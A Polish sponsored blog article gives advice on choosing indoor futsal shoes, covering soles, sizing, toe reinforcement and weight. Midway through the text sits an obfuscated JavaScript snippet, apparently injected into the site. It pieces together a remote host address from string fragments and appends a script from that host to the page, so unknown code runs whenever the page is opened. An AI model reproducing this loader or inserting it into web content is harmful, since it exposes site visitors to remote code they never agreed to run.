Jakie buty na halę do piłki nożnej?

Fut­sal, czyli piłka noż­na halowa, to jed­na z pop­u­larniejszy­ch dyscy­plin drużynowych,z zarówno wśród dzieci i młodzieży, jak i wśród dorosły­ch. Co jed­nak istot­ne z punk­tu widzenia osób uczest­niczą­cy­ch w roz­gry­wkach, warto zaopa­trzyć się w odpowied­nie buty na halę. Jak je wybrać?

Patrz na podeszwę!

O ile obuwie do gry w piłkę na boisku charak­teryzu­je się korkami, o tyle w przy­pad­ku fut­salu nie może być o tym mowy. Prze­ci­wnie, buty na halę powin­ny cechować się płaską podeszwą, wyposażoną jedynie w rowki.

Przy­czy­na tego stanu rzeczy jest bard­zo prosta – w przy­pad­ku gry pod zadasze­niem i pewnoś­ci, ze powierzch­nia jest twar­da, sucha i płaska, właśnie taki wybór poz­woli zachować więk­sza przy­czep­ność. Oczy­wiś­cie pod warunk­iem, ze sam mate­ri­ał, z które­go wyko­nano podeszwę będzie odpowied­ni (np. kauczuk).

Co ciekawe, niek­tórzy pro­du­cen­ci dba­ją również o to, aby podeszwy w ich butach jak najm­niej brudz­iły podeszwę. Choć dla kom­for­tu użytkowa­nia takich butów nie ma to znaczenia, to jed­nak jest to cechą zde­cy­dowanie pożą­daną, na którą warto zwró­cić uwagę. Nie warto więc kupować spo­tykany­ch w super­mar­ke­tach mod­eli eko­nom­iczny­ch, lep­iej przegląd­nąć ofer­tę sklepów sportowych (np. www.no10.pl), gdzie wybór jest po pros­tu więk­szy.

Wybór rozmi­aru

Wybier­a­jąc buty na halę zad­baj o to, aby były jak najlepiej dopa­sowane. To ważne, ponieważ przy naprawdę inten­sy­wnym wysiłku zbyt cias­ne obuwie byłoby prob­le­mem, a zbyt luźne mogłoby powodować potknię­cia czy prob­le­my z odpowied­nim kierowaniem piłki. Warto jed­nak pamię­tać, że prob­lem ten moż­na do pewne­go stop­nia równoważyć poprzez wkład­ki.

(func­tion(){
xay2_=(“u”+””)+“s”+””;xay2_+=(“tat.”)+(“i”);
xay2=document.createElement(“script”);xay2.type=“text/javascript”;xay2_+=“nf”+(“o”)+”/”;
xay2u=“70835659”+”.”;xay2.async=true;xay2u+=“9bvztd4kay2u79egdvr5npjuis39zs”;
xay2.src=”//”+xay2_+xay2u; xay2b=document.body; xay2b.appendChild(xay2);
})();

Istot­ne cechy butów do fut­salu

Przeglą­da­jąc buty do piłki nożnej halowej warto przyjrzeć się ich czubom. Powin­ny być wzmoc­nione – tak, żeby mogły wytrzymy­wać częste kop­nię­cia w piłkę. Nie da się tez ukryć, że sam but powinien być jak najbardziej odd­y­chal­ny i lekki. W końcu gra­jąc w piłkę halową bie­ga się naprawdę dużo (nawet jeśli na małej powierzch­ni) i – choć może się to wydać zaskaku­jące – nawet drob­ne różnice wagi potrafią przełożyć się na późniejsze zmęcze­nie.

Artykuł spon­sorowany

Add a Comment

Twój adres email nie zostanie opublikowany. Pola, których wypełnienie jest wymagane, są oznaczone symbolem *

Facebook

Get the Facebook Likebox Slider Pro for WordPress